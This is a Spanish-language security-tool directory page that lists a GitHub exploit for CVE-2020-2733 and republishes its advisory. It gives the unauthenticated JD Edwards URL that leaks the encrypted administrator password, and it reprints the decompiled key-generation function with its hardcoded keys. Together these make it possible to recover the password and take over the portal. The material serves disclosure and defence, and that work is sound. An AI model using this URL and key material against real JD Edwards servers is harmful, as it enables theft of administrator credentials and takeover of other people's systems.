Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-2733 | Kitploit
Herramientas/GitHubGitHub/anmolksachan/cve-2020-2733
Herramientas de Cifrado/DescifradoAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónMala Configuración
GitHubanmolksachan/cve-2020-2733

CVE-2020-2733

Ver Repositorio
1hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-2733 - La contraseña de administrador de JD Edwards EnterpriseOne Tools no está protegida adecuadamente

image
Imagen 1: Descifrar la cadena
image
Imagen 2: Descifrar proporcionando la URL

[CVE-2020-2733]

Aplicación: JD Edwards EnterpriseOne Tools
Versiones afectadas: JD Edwards EnterpriseOne Tools 9.2
URL del proveedor: https://oracle.com/
Fallo: Divulgación de información
Reportado: 18 de septiembre de 2019
Fecha del aviso público: 23 de agosto de 2022
Referencia: [https://www.oracle.com/security-alerts/cpuapr2020.html, https://redrays.io/cve-2020-2733-jd-edwards/]
Plantilla de Nuclei para detección: https://github.com/projectdiscovery/nuclei-templates/blob/68f0ad5fa2f54a08959e2d68633174750fcb4952/http/cves/2020/CVE-2020-2733.yaml#L2

Descripción

INFORMACIÓN DEL AVISO
Título: [CVE-2020-2733] La contraseña de administrador de JD Edwards EnterpriseOne Tools no está protegida adecuadamente
Riesgo: Crítico
URL del aviso: https://redrays.io/cve-2020-6369-patch-bypass/
Fecha de publicación: 23.08.2022

INFORMACIÓN DE LA VULNERABILIDAD


Explotable de forma remota: Sí
Explotable localmente: No


Información CVSS: Puntuación base CVSS v3.1: 9.8 / 10 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

DESCRIPCIÓN DE LA VULNERABILIDAD

JD Edwards EnterpriseOne Tools 9.2 o versiones inferiores permiten a atacantes no autenticados omitir la autenticación y obtener derechos de administrador en el sistema.

DESCRIPCIÓN TÉCNICA

La vulnerabilidad fue descubierta en el portal de gestión de Oracle JD Edwards. Para reproducir la vulnerabilidad, es necesario abrir (sin autenticación) la siguiente URL

http://JDEdwards:8999/manage/fileDownloader?sec=1

Al abrir la URL, se puede ver texto pseudoaleatorio en la página. unnamed-2-e1661254647723

root@kitploit:~
ACHCJKGJHCJKBLLALOLOJFCABEFHOALDDAOFNGGANPDB


Después de analizar los archivos jar de JD Edwards, descubrimos que estos datos pseudoaleatorios son: ¡LA CONTRASEÑA DE ADMINISTRADOR CIFRADA!

Las claves de cifrado se encuentran en la siguiente función

root@kitploit:~
private static void genKeys(byte[] paramArrayOfByte1, byte[] paramArrayOfByte2, byte paramByte)
{
int i = 0;
byte[] arrayOfByte1 = { 65, 4, 95, 12, 88, 41, 6, 114, 119, 93, 37, 68, 75, 19, 49, 46 };
byte[] arrayOfByte2 = { 107, 34, 26, 94, 68, 41, 119, 48, 3, 88, 28, 97, 5, Byte.MAX_VALUE, 77, 54 };
byte[] arrayOfByte3 = { 36, 89, 113, 109, 38, 15, 7, 66, 76, 115, 16, 53, 106, 94, 27, 56 };
int j = paramByte >> 4;
int k = paramByte & 0xF;
int m = arrayOfByte3[j];
for (i = 0; i < 16; i++) {
paramArrayOfByte1[i] = ((byte)(arrayOfByte1[i] ^ m));
}
m = arrayOfByte3[k];
for (i = 0; i < 16; i++) {
paramArrayOfByte2[i] = ((byte)(arrayOfByte2[i] ^ m));
}
}

Como resultado, obtendrá la contraseña de administrador y podrá implementar cualquier aplicación en el portal de JD Edwards. image

Referencia/Crédito: https://redrays.io/blog/cve-2020-2733-jd-edwards/

Descargar herramienta